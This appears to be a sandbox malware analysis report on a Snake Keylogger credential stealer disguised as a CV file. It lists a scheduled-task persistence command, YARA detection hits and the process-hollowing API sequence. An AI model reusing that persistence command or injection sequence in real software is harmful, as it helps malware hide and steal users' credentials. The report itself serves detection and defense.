                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"
                                              Imagebase:0xfb0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x160000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x80000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:12:21:17
                                              Start date:18/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xc90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3288992952.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.3288992952.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Target ID:12
                                              Start time:12:21:18
                                              Start date:18/11/2024
                                              Path:C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
                                              Imagebase:0xae0000
                                              File size:634'888 bytes
                                              MD5 hash:8F6D690E119684B1629D41F97B83FB23
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 30%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:12:21:19
                                              Start date:18/11/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6ef0c0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:12:21:27
                                              Start date:18/11/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"
                                              Imagebase:0xfb0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:12:21:27
                                              Start date:18/11/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:12:21:27
                                              Start date:18/11/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x7e0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3289778566.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3289778566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:167
                                                Total number of Limit Nodes:13
                                                execution_graph 26781 18ae398 26782 18ae3de GetCurrentProcess 26781->26782 26784 18ae429 26782->26784 26785 18ae430 GetCurrentThread 26782->26785 26784->26785 26786 18ae46d GetCurrentProcess 26785->26786 26787 18ae466 26785->26787 26788 18ae4a3 GetCurrentThreadId 26786->26788 26787->26786 26790 18ae4fc 26788->26790 26791 18a4668 26792 18a4672 26791->26792 26794 18a4759 26791->26794 26795 18a477d 26794->26795 26799 18a4868 26795->26799 26803 18a4859 26795->26803 26801 18a488f 26799->26801 26800 18a496c 26801->26800 26807 18a44d4 26801->26807 26804 18a488f 26803->26804 26805 18a496c 26804->26805 26806 18a44d4 CreateActCtxA 26804->26806 26805->26805 26806->26805 26808 18a58f8 CreateActCtxA 26807->26808 26810 18a59bb 26808->26810 26811 7d7d1f4 26812 7d7d164 26811->26812 26813 7d7d0f1 26811->26813 26813->26812 26816 7d7fb37 26813->26816 26834 7d7fb38 26813->26834 26817 7d7fb38 26816->26817 26822 7d7fb76 26817->26822 26852 b1d025d 26817->26852 26858 b1d01a0 26817->26858 26865 b1d08c6 26817->26865 26869 b1d0287 26817->26869 26876 b1d0845 26817->26876 26881 b1d0989 26817->26881 26885 b1d01af 26817->26885 26892 b1d052c 26817->26892 26896 b1d020d 26817->26896 26901 b1d080d 26817->26901 26906 b1d0633 26817->26906 26911 b1d02f6 26817->26911 26916 b1d0138 26817->26916 26920 b1d067f 26817->26920 26925 b1d03bf 26817->26925 26822->26812 26835 7d7fb52 26834->26835 26836 7d7fb76 26835->26836 26837 b1d025d 2 API calls 26835->26837 26838 b1d03bf 4 API calls 26835->26838 26839 b1d067f 2 API calls 26835->26839 26840 b1d0138 2 API calls 26835->26840 26841 b1d02f6 2 API calls 26835->26841 26842 b1d0633 2 API calls 26835->26842 26843 b1d080d 2 API calls 26835->26843 26844 b1d020d 2 API calls 26835->26844 26845 b1d052c 2 API calls 26835->26845 26846 b1d01af 4 API calls 26835->26846 26847 b1d0989 2 API calls 26835->26847 26848 b1d0845 2 API calls 26835->26848 26849 b1d0287 4 API calls 26835->26849 26850 b1d08c6 2 API calls 26835->26850 26851 b1d01a0 4 API calls 26835->26851 26836->26812 26837->26836 26838->26836 26839->26836 26840->26836 26841->26836 26842->26836 26843->26836 26844->26836 26845->26836 26846->26836 26847->26836 26848->26836 26849->26836 26850->26836 26851->26836 26853 b1d031f 26852->26853 26854 b1d066d 26853->26854 26932 7d7c950 26853->26932 26936 7d7c958 26853->26936 26854->26822 26855 b1d0340 26855->26822 26859 b1d018d 26858->26859 26860 b1d04b5 26859->26860 26940 7d7c7c0 26859->26940 26944 7d7c7b8 26859->26944 26948 7d7ca41 26859->26948 26952 7d7ca48 26859->26952 26860->26822 26867 7d7c7c0 Wow64SetThreadContext 26865->26867 26868 7d7c7b8 Wow64SetThreadContext 26865->26868 26866 b1d08c5 26866->26865 26867->26866 26868->26866 26870 b1d018d 26869->26870 26871 b1d029b 26870->26871 26872 7d7ca41 ReadProcessMemory 26870->26872 26873 7d7ca48 ReadProcessMemory 26870->26873 26874 7d7c7c0 Wow64SetThreadContext 26870->26874 26875 7d7c7b8 Wow64SetThreadContext 26870->26875 26871->26822 26872->26870 26873->26870 26874->26870 26875->26870 26877 b1d02b8 26876->26877 26877->26876 26878 b1d0ab5 26877->26878 26879 7d7c950 WriteProcessMemory 26877->26879 26880 7d7c958 WriteProcessMemory 26877->26880 26879->26877 26880->26877 26882 b1d08c5 26881->26882 26882->26881 26883 7d7c7c0 Wow64SetThreadContext 26882->26883 26884 7d7c7b8 Wow64SetThreadContext 26882->26884 26883->26882 26884->26882 26890 7d7c7c0 Wow64SetThreadContext 26885->26890 26891 7d7c7b8 Wow64SetThreadContext 26885->26891 26886 b1d018d 26886->26885 26887 b1d04b5 26886->26887 26888 7d7ca41 ReadProcessMemory 26886->26888 26889 7d7ca48 ReadProcessMemory 26886->26889 26887->26822 26888->26886 26889->26886 26890->26886 26891->26886 26956 7d7c890 26892->26956 26960 7d7c898 26892->26960 26893 b1d054a 26897 b1d021a 26896->26897 26964 7d7c710 26897->26964 26968 7d7c709 26897->26968 26898 b1d0742 26902 b1d09a7 26901->26902 26904 7d7c950 WriteProcessMemory 26902->26904 26905 7d7c958 WriteProcessMemory 26902->26905 26903 b1d09cb 26904->26903 26905->26903 26907 b1d0639 26906->26907 26909 7d7c710 ResumeThread 26907->26909 26910 7d7c709 ResumeThread 26907->26910 26908 b1d0742 26909->26908 26910->26908 26912 b1d02fc 26911->26912 26914 7d7c950 WriteProcessMemory 26912->26914 26915 7d7c958 WriteProcessMemory 26912->26915 26913 b1d0340 26913->26822 26914->26913 26915->26913 26972 7d7cbd5 26916->26972 26976 7d7cbe0 26916->26976 26921 b1d0685 26920->26921 26923 7d7c710 ResumeThread 26921->26923 26924 7d7c709 ResumeThread 26921->26924 26922 b1d0742 26923->26922 26924->26922 26928 7d7ca41 ReadProcessMemory 26925->26928 26929 7d7ca48 ReadProcessMemory 26925->26929 26926 b1d04b5 26926->26822 26927 b1d018d 26927->26925 26927->26926 26930 7d7c7c0 Wow64SetThreadContext 26927->26930 26931 7d7c7b8 Wow64SetThreadContext 26927->26931 26928->26927 26929->26927 26930->26927 26931->26927 26933 7d7c9a0 WriteProcessMemory 26932->26933 26935 7d7c9f7 26933->26935 26935->26855 26937 7d7c9a0 WriteProcessMemory 26936->26937 26939 7d7c9f7 26937->26939 26939->26855 26941 7d7c805 Wow64SetThreadContext 26940->26941 26943 7d7c84d 26941->26943 26943->26859 26945 7d7c7c0 Wow64SetThreadContext 26944->26945 26947 7d7c84d 26945->26947 26947->26859 26949 7d7ca93 ReadProcessMemory 26948->26949 26951 7d7cad7 26949->26951 26951->26859 26953 7d7ca93 ReadProcessMemory 26952->26953 26955 7d7cad7 26953->26955 26955->26859 26957 7d7c898 VirtualAllocEx 26956->26957 26959 7d7c915 26957->26959 26959->26893 26961 7d7c8d8 VirtualAllocEx 26960->26961 26963 7d7c915 26961->26963 26963->26893 26965 7d7c750 ResumeThread 26964->26965 26967 7d7c781 26965->26967 26967->26898 26969 7d7c710 ResumeThread 26968->26969 26971 7d7c781 26969->26971 26971->26898 26973 7d7cbe0 CreateProcessA 26972->26973 26975 7d7ce2b 26973->26975 26977 7d7cc69 CreateProcessA 26976->26977 26979 7d7ce2b 26977->26979 26761 18ac300 26762 18ac348 GetModuleHandleW 26761->26762 26763 18ac342 26761->26763 26764 18ac375 26762->26764 26763->26762 26980 18ae5e0 DuplicateHandle 26981 18ae676 26980->26981 26765 b1d0fd0 26766 b1d115b 26765->26766 26767 b1d0ff6 26765->26767 26767->26766 26771 b1d1249 26767->26771 26774 b1d12e0 26767->26774 26779 b1d1250 PostMessageW 26767->26779 26772 b1d1250 PostMessageW 26771->26772 26773 b1d12bc 26772->26773 26773->26767 26775 b1d127e PostMessageW 26774->26775 26778 b1d12ee 26774->26778 26777 b1d12bc 26775->26777 26777->26767 26780 b1d12bc 26779->26780 26780->26767
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8e2f3d3c4ef33b033efee372a4535a6f4622381c9a4461c7ba723d31ac97143
                                                • Instruction ID: 76b3a9b397b816966c8759e37f127ca1e2dc242be06df47fdb6133ee3c5dd67a
                                                • Opcode Fuzzy Hash: e8e2f3d3c4ef33b033efee372a4535a6f4622381c9a4461c7ba723d31ac97143
                                                • Instruction Fuzzy Hash: 27E1F1317016049FEB29DF79C460BAEBBFAAF88301F54846DD556DB290CB39E901CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea163cd972f625b53683778355f6148beb61c4f29c9076318e6694bbf035be9a
                                                • Instruction ID: 5ecd1fbe2a9d4657928f419e5166f854e67f2cb9ffbbe7a1f170d2dff47b5a96
                                                • Opcode Fuzzy Hash: ea163cd972f625b53683778355f6148beb61c4f29c9076318e6694bbf035be9a
                                                • Instruction Fuzzy Hash: CCC191B4E042598FDB14CFA9C980A9DFBF2BF89300F24956AD819E7315EB319941DF50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f8784af9d5fdb0b0894f21aed84b55380628dc5dc490016c17c3cf3f93c52ce
                                                • Instruction ID: 858a8a36a3532a67cbbaa4964729d65ac737cb0f216e02842fc431e1870f19da
                                                • Opcode Fuzzy Hash: 8f8784af9d5fdb0b0894f21aed84b55380628dc5dc490016c17c3cf3f93c52ce
                                                • Instruction Fuzzy Hash: 54A0018898F65CC58008182400AACB9C2AE9A0FC08E527204852F324069A50C141842E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 18ae398-18ae427 GetCurrentProcess 298 18ae429-18ae42f 294->298 299 18ae430-18ae464 GetCurrentThread 294->299 298->299 300 18ae46d-18ae4a1 GetCurrentProcess 299->300 301 18ae466-18ae46c 299->301 302 18ae4aa-18ae4c2 300->302 303 18ae4a3-18ae4a9 300->303 301->300 307 18ae4cb-18ae4fa GetCurrentThreadId 302->307 303->302 308 18ae4fc-18ae502 307->308 309 18ae503-18ae565 307->309 308->309
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 018AE416
                                                • GetCurrentThread.KERNEL32 ref: 018AE453
                                                • GetCurrentProcess.KERNEL32 ref: 018AE490
                                                • GetCurrentThreadId.KERNEL32 ref: 018AE4E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 12a9510607344eab96668c1f927030cbcbfd13ca98bda9994b90b2d9ca212884
                                                • Instruction ID: 6c5edf69b677df9b22f8645f4094fe4f35b799607852b01573589996dd245179
                                                • Opcode Fuzzy Hash: 12a9510607344eab96668c1f927030cbcbfd13ca98bda9994b90b2d9ca212884
                                                • Instruction Fuzzy Hash: BA5176B09016498FEB14DFA9D588BAEBFF5FF48300F208419E519A7360DB38A944CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 337 7d7cbd5-7d7cc75 340 7d7cc77-7d7cc81 337->340 341 7d7ccae-7d7ccce 337->341 340->341 342 7d7cc83-7d7cc85 340->342 348 7d7cd07-7d7cd36 341->348 349 7d7ccd0-7d7ccda 341->349 343 7d7cc87-7d7cc91 342->343 344 7d7cca8-7d7ccab 342->344 346 7d7cc95-7d7cca4 343->346 347 7d7cc93 343->347 344->341 346->346 351 7d7cca6 346->351 347->346 357 7d7cd6f-7d7ce29 CreateProcessA 348->357 358 7d7cd38-7d7cd42 348->358 349->348 350 7d7ccdc-7d7ccde 349->350 352 7d7cd01-7d7cd04 350->352 353 7d7cce0-7d7ccea 350->353 351->344 352->348 355 7d7ccee-7d7ccfd 353->355 356 7d7ccec 353->356 355->355 359 7d7ccff 355->359 356->355 369 7d7ce32-7d7ceb8 357->369 370 7d7ce2b-7d7ce31 357->370 358->357 360 7d7cd44-7d7cd46 358->360 359->352 362 7d7cd69-7d7cd6c 360->362 363 7d7cd48-7d7cd52 360->363 362->357 364 7d7cd56-7d7cd65 363->364 365 7d7cd54 363->365 364->364 367 7d7cd67 364->367 365->364 367->362 380 7d7ceba-7d7cebe 369->380 381 7d7cec8-7d7cecc 369->381 370->369 380->381 382 7d7cec0 380->382 383 7d7cece-7d7ced2 381->383 384 7d7cedc-7d7cee0 381->384 382->381 383->384 385 7d7ced4 383->385 386 7d7cee2-7d7cee6 384->386 387 7d7cef0-7d7cef4 384->387 385->384 386->387 388 7d7cee8 386->388 389 7d7cf06-7d7cf0d 387->389 390 7d7cef6-7d7cefc 387->390 388->387 391 7d7cf24 389->391 392 7d7cf0f-7d7cf1e 389->392 390->389 394 7d7cf25 391->394 392->391 394->394
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07D7CE16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 9dbe7e43c7dc2484bbf48b82eca8582d71a2358365b180a607188c94fdb4b047
                                                • Instruction ID: a7789f2f592044de8ac1cd4231b3e6285b7a0767a87aa358a157254a6c21bd00
                                                • Opcode Fuzzy Hash: 9dbe7e43c7dc2484bbf48b82eca8582d71a2358365b180a607188c94fdb4b047
                                                • Instruction Fuzzy Hash: 3CA160B1D1061ACFDB20DF68C8817DDFBB6BF48310F148569D809A7294EB749985CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 395 7d7cbe0-7d7cc75 397 7d7cc77-7d7cc81 395->397 398 7d7ccae-7d7ccce 395->398 397->398 399 7d7cc83-7d7cc85 397->399 405 7d7cd07-7d7cd36 398->405 406 7d7ccd0-7d7ccda 398->406 400 7d7cc87-7d7cc91 399->400 401 7d7cca8-7d7ccab 399->401 403 7d7cc95-7d7cca4 400->403 404 7d7cc93 400->404 401->398 403->403 408 7d7cca6 403->408 404->403 414 7d7cd6f-7d7ce29 CreateProcessA 405->414 415 7d7cd38-7d7cd42 405->415 406->405 407 7d7ccdc-7d7ccde 406->407 409 7d7cd01-7d7cd04 407->409 410 7d7cce0-7d7ccea 407->410 408->401 409->405 412 7d7ccee-7d7ccfd 410->412 413 7d7ccec 410->413 412->412 416 7d7ccff 412->416 413->412 426 7d7ce32-7d7ceb8 414->426 427 7d7ce2b-7d7ce31 414->427 415->414 417 7d7cd44-7d7cd46 415->417 416->409 419 7d7cd69-7d7cd6c 417->419 420 7d7cd48-7d7cd52 417->420 419->414 421 7d7cd56-7d7cd65 420->421 422 7d7cd54 420->422 421->421 424 7d7cd67 421->424 422->421 424->419 437 7d7ceba-7d7cebe 426->437 438 7d7cec8-7d7cecc 426->438 427->426 437->438 439 7d7cec0 437->439 440 7d7cece-7d7ced2 438->440 441 7d7cedc-7d7cee0 438->441 439->438 440->441 442 7d7ced4 440->442 443 7d7cee2-7d7cee6 441->443 444 7d7cef0-7d7cef4 441->444 442->441 443->444 445 7d7cee8 443->445 446 7d7cf06-7d7cf0d 444->446 447 7d7cef6-7d7cefc 444->447 445->444 448 7d7cf24 446->448 449 7d7cf0f-7d7cf1e 446->449 447->446 451 7d7cf25 448->451 449->448 451->451
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07D7CE16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 2689b1a55e0ca8a65de571f351c57d7ad2a23f4027733f7f5772332d14b8508f
                                                • Instruction ID: a792aeed0785ae9e73d53cc7f33d5c29b96aa223fe92e9e6c142933bd4dab88b
                                                • Opcode Fuzzy Hash: 2689b1a55e0ca8a65de571f351c57d7ad2a23f4027733f7f5772332d14b8508f
                                                • Instruction Fuzzy Hash: EE916EB1D1061ACFDB20DF68C8817EDFBB6BF48310F148569D809A7294EB749985CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 561 18a44d4-18a59b9 CreateActCtxA 564 18a59bb-18a59c1 561->564 565 18a59c2-18a5a1c 561->565 564->565 572 18a5a2b-18a5a2f 565->572 573 18a5a1e-18a5a21 565->573 574 18a5a40 572->574 575 18a5a31-18a5a3d 572->575 573->572 576 18a5a41 574->576 575->574 576->576
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 018A59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 7e79abee387dfbd5bc5cf845429d25d735d5ee6782885055df4f9baad473d412
                                                • Instruction ID: 6725c75f7fde8e33716620ea6c6ff9d8d3c7e3b6bad23699e6b38e3d3c6456e4
                                                • Opcode Fuzzy Hash: 7e79abee387dfbd5bc5cf845429d25d735d5ee6782885055df4f9baad473d412
                                                • Instruction Fuzzy Hash: 6A4115B0C0071DCBDB24DF99C884B9DBBF5BF48304F64805AD408AB255DB756949CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 578 18a58ec-18a59b9 CreateActCtxA 580 18a59bb-18a59c1 578->580 581 18a59c2-18a5a1c 578->581 580->581 588 18a5a2b-18a5a2f 581->588 589 18a5a1e-18a5a21 581->589 590 18a5a40 588->590 591 18a5a31-18a5a3d 588->591 589->588 592 18a5a41 590->592 591->590 592->592
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 018A59A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: cf5bfa0eec6ec7316ba7232dca6d923795a646e89d4ff78b7c97db6afe89508d
                                                • Instruction ID: 98c113d5c8c104df43b518455b93ed404c8373496f18f7da6c480bfdee17dc9b
                                                • Opcode Fuzzy Hash: cf5bfa0eec6ec7316ba7232dca6d923795a646e89d4ff78b7c97db6afe89508d
                                                • Instruction Fuzzy Hash: 8141F2B1D00719CFEB24CFA9C984B8DBBF5BF49304F24805AD418AB255DB75698ACF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 594 b1d12e0-b1d12ec 595 b1d127e-b1d1293 594->595 596 b1d12ee-b1d1315 594->596 597 b1d129d-b1d12ba PostMessageW 595->597 598 b1d1295-b1d1298 595->598 599 b1d131c-b1d132f 596->599 600 b1d1317 596->600 601 b1d12bc-b1d12c2 597->601 602 b1d12c3-b1d12d7 597->602 598->597 605 b1d1331-b1d133e 599->605 606 b1d1340-b1d135b 599->606 600->599 601->602 605->606 609 b1d135d 606->609 610 b1d1365 606->610 609->610 611 b1d1366 610->611 611->611
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: ec4f2297bbcc19ba8b80f0d09630d97940a82055fedf5a4f908e307bca7a7fa9
                                                • Instruction ID: e5890bf3a349e796c528215206c3333a56ebbf44389f6780e29d03c7ea786059
                                                • Opcode Fuzzy Hash: ec4f2297bbcc19ba8b80f0d09630d97940a82055fedf5a4f908e307bca7a7fa9
                                                • Instruction Fuzzy Hash: 5D21EC72E04319AFDB21CFA8D9147EEBBF1EF49320F24844AC841B7642C7395A14CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 612 7d7c950-7d7c9a6 614 7d7c9b6-7d7c9f5 WriteProcessMemory 612->614 615 7d7c9a8-7d7c9b4 612->615 617 7d7c9f7-7d7c9fd 614->617 618 7d7c9fe-7d7ca2e 614->618 615->614 617->618
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07D7C9E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 87f41d55a4ebb503cb868525b11030ef2ae4c3a746b827cf16e610626a06adbb
                                                • Instruction ID: dc57e1725bdd4c79ed6f0474eaff7556cb39bdf0535726ec980b2b7170b193fe
                                                • Opcode Fuzzy Hash: 87f41d55a4ebb503cb868525b11030ef2ae4c3a746b827cf16e610626a06adbb
                                                • Instruction Fuzzy Hash: EC2146B19003499FCB10CFA9C985BEEBFF5FF48310F14842AE959A7251D7789944CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
